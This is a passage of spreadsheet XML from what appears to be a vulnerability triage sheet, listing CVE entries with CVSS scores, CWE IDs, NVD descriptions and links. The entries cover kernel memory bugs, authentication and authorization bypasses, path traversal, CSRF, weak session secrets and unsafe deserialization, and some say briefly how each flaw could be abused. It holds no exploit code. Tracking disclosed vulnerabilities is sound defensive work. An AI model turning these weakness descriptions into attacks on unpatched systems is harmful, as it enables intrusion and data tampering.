      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr"/>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Hold vport reference in qla24xx_report_id_acquisition()
In the format 1 path, the virtual port is located on ha-&gt;vp_list while
holding vport_slock, but the lock is dropped before vp is used:
qla_update_host_map() is called and VP_IDX_ACQUIRED/REGISTER_FC4_NEEDED/
REGISTER_FDMI_NEEDED are set on vp. No reference is taken across that
window, so a concurrent qla24xx_deallocate_vp_id() can tear the vport
down and free it, leading to a use-after-free.
Take a vport reference (vref_count) under vport_slock when the matching
vp is found, and drop it after the last use of
vp. qla24xx_deallocate_vp_id() waits for vref_count to reach zero before
unlinking and freeing the vport, so the pointer stays valid. This
matches the reference idiom already used by the other ha-&gt;vp_list
traversals.</t>
        </is>
      </c>
      <c r="S406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89861</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89999</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr"/>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: wacom: validate report length in wacom_intuos_pro2_bt_irq
wacom_intuos_pro2_bt_irq() receives the wire report length in `len`
but never consults it before parsing. After the report-id gate it
unconditionally calls wacom_intuos_pro2_bt_pen() and then, selected by
features.type, a fixed chain of sub-parsers, none of which receive
`len`:
	wacom_intuos_pro2_bt_pen(wacom);
	if (type == INTUOSP2_BT || type == INTUOSP2S_BT) {
		wacom_intuos_pro2_bt_touch(wacom);
		wacom_intuos_pro2_bt_pad(wacom);
		wacom_intuos_pro2_bt_battery(wacom);
	} else {
		wacom_intuos_gen3_bt_pad(wacom);
		wacom_intuos_gen3_bt_battery(wacom);
	}
Each sub-parser dereferences wacom-&gt;data at fixed offsets. The furthest
byte touched on each branch is:
  INTUOSP2_BT / INTUOSP2S_BT: wacom_intuos_pro2_bt_pad() reads data[285]
	(the touchring byte), so the report must be at least 286 bytes;
  INTUOSHT3_BT ("gen3"): wacom_intuos_gen3_bt_battery() reads data[45],
	so the report must be at least 46 bytes.
features.type is selected from the VID/PID id_table entry and
wacom_setup_device_quirks() force-registers the pen/pad/touch inputs
for that type independent of the report descriptor, so a malicious or
malfunctioning paired/spoofed Bluetooth peripheral can advertise that
VID/PID and send an undersized report that still satisfies the
data[0] == 0x80/0x81 gate. The driver then reads past the received
report and forwards the bytes to userspace via evdev (MSC_SERIAL /
ABS_MISC / ABS_WHEEL on the pen and pad input nodes), an out-of-bounds
read with a concrete userspace read-back channel, and a true
out-of-bounds read on transports whose backing buffer is sized to the
(small) report descriptor rather than a fixed-size staging buffer.
This is the same class of bug commit 2f1763f62909 ("HID: wacom: fix
out-of-bounds read in wacom_intuos_bt_irq") already hardened in the
sibling wacom_intuos_bt_irq(), which guards each report id against its
minimum length before parsing.
Guard wacom_intuos_pro2_bt_irq() the same way: before parsing, reject
reports shorter than the furthest offset the selected branch actually
dereferences, warn, and bail out. Because the whole pen/touch/pad/
battery chain runs unconditionally per branch, a single up-front check
against the maximum offset (286 bytes for INTUOSP2_BT/INTUOSP2S_BT,
46 bytes for the gen3 branch) bounds every sub-parser. Returning 0 on
a short report also skips those calls for the same malformed report,
which is the safe, conservative behavior.</t>
        </is>
      </c>
      <c r="S407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89999</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92087</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="inlineStr"/>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr"/>
      <c r="Q408" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-697</t>
        </is>
      </c>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>@fastify/auth is a Fastify plugin that composes multiple authentication and authorization strategies into a single route guard. In versions 5.0.0 through 5.1.0, when strategies are composed with the relation "or" option together with the run "all" option and one entry is a nested array acting as an AND group, the group is evaluated in an order-dependent way: an earlier failing check is silently dropped and the group's result becomes the outcome of its last check. As a result, a request that satisfies only the last member of an AND group, for example an attacker who holds a valid API key but is not an administrator, is authorized instead of rejected, and a related order-dependent bypass affects the mirror configuration where the top-level relation is "and" and a nested group uses "or". The issue is fixed in @fastify/auth 5.1.1, and users should upgrade to 5.1.1 or later. As a workaround, omit the run "all" option where it is not required, order each AND group so its stricter check is evaluated last, or replace nested AND groups with an explicit top-level "and" composition.</t>
        </is>
      </c>
      <c r="S408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92087</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92578</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="inlineStr"/>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr"/>
      <c r="Q409" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through 29.0 contains an authentication bypass vulnerability where the stored password hash is accepted as a valid login credential through two independent code paths in loginFromRequest() and encryptPasswordVerify(). Attackers who obtain the stored users.password hash value can authenticate as any user by submitting the hash directly to login endpoints, completely bypassing password verification.</t>
        </is>
      </c>
      <c r="S409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92578</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92604</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="inlineStr"/>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr"/>
      <c r="Q410" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>Scirius through 3.8.0 contains an arbitrary file write vulnerability in the PCAP filestore upload endpoint that allows default User role users to write attacker-controlled JSON content to filesystem paths. Attackers can supply path traversal sequences in the uploaded document's _id field to escape the intended directory and write files with .json extension to arbitrary locations as root.</t>
        </is>
      </c>
      <c r="S410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92604</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92749</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="inlineStr"/>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr"/>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr"/>
      <c r="Q411" s="5" t="inlineStr">
        <is>
          <t>CWE-338</t>
        </is>
      </c>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>SafeLine through 9.4.1 derives the management console session-signing secret from a time-seeded math/rand generator, allowing attackers to reconstruct the key offline. Unauthenticated remote attackers who can bound the install timestamp can regenerate the secret and forge valid administrator session cookies to gain control of protected sites.</t>
        </is>
      </c>
      <c r="S411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92749</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92751</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="inlineStr"/>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr"/>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr"/>
      <c r="Q412" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>CMAK through 3.0.0.6 fails to install a cross-site request forgery filter, allowing attackers to perform state-changing actions on behalf of authenticated operators. Attackers can craft hidden forms that submit to destructive endpoints like topic deletion and cluster configuration changes, leveraging the operator's HTTP Basic authentication credentials or play-basic-authentication cookie without SameSite protection.</t>
        </is>
      </c>
      <c r="S412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92751</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92763</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="inlineStr"/>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr"/>
      <c r="Q413" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>Rundeck through 6.2.1 fails to properly authorize the importConfig and importNodesSources parameters in the project archive import endpoint. Attackers with only the import action can replace project configuration files including security-relevant settings like node executors and SSH key paths that affect job execution.</t>
        </is>
      </c>
      <c r="S413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92763</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92776</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="inlineStr"/>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr"/>
      <c r="Q414" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>Wiki.js through 2.5.314 fails to require path separators when matching START and END page rules, allowing attackers to access pages sharing a prefix with authorized folders. Users granted access to a folder can read and modify unrelated pages with matching prefixes, bypassing intended access controls.</t>
        </is>
      </c>
      <c r="S414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92776</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92782</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="inlineStr"/>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr"/>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr"/>
      <c r="Q415" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>Chroma through 1.5.9 fails to validate tenant and database segments when resolving collections, allowing authenticated attackers to access collections from other tenants by knowing the collection identifier. Attackers can read, modify, and update records in foreign collections by issuing requests under their own tenant path, bypassing authorization checks.</t>
        </is>
      </c>
      <c r="S415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92782</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92783</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr"/>
      <c r="Q416" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>Yeti through 2.11.0 fails to validate caller permissions in the DELETE /api/v2/rbac/{id} endpoint, allowing users with read access to delete access control relationships. Attackers can revoke the owner's grant and permanently lock legitimate owners out of objects.</t>
        </is>
      </c>
      <c r="S416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92783</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92785</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="inlineStr"/>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr"/>
      <c r="Q417" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>Angel through 3.3.0 deserializes untrusted setAlgoMetrics payload using Kryo without class registration or allowlist validation. Unauthenticated network attackers can instantiate arbitrary classes or exhaust coordinator memory by sending crafted serialized objects to the master RPC endpoint.</t>
        </is>
      </c>
      <c r="S417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92785</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92793</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="inlineStr"/>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr"/>
      <c r="Q418" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>GoAdmin through 1.2.26 fails to properly anchor the logout pattern when checking permissions, allowing authenticated users to bypass permission checks by appending a query parameter. Attackers can append a query string containing the admin prefix followed by /logout to reach administrative endpoints and perform unauthorized actions including reading sensitive data and modifying application state.</t>
        </is>
      </c>
      <c r="S418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92793</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92806</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="inlineStr"/>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr"/>
      <c r="L419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr"/>
      <c r="Q419" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>phpList versions before 3.6.17 fail to validate cross-site request forgery tokens in the mass subscriber removal form handler. Attackers can induce logged-in administrators to visit crafted pages that silently delete and blacklist arbitrary subscriber addresses without authentication verification.</t>
        </is>
      </c>
      <c r="S419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92806</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69423</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K420"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420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr"/>
      <c r="Q420" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69503</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K421" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr"/>
      <c r="Q421" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
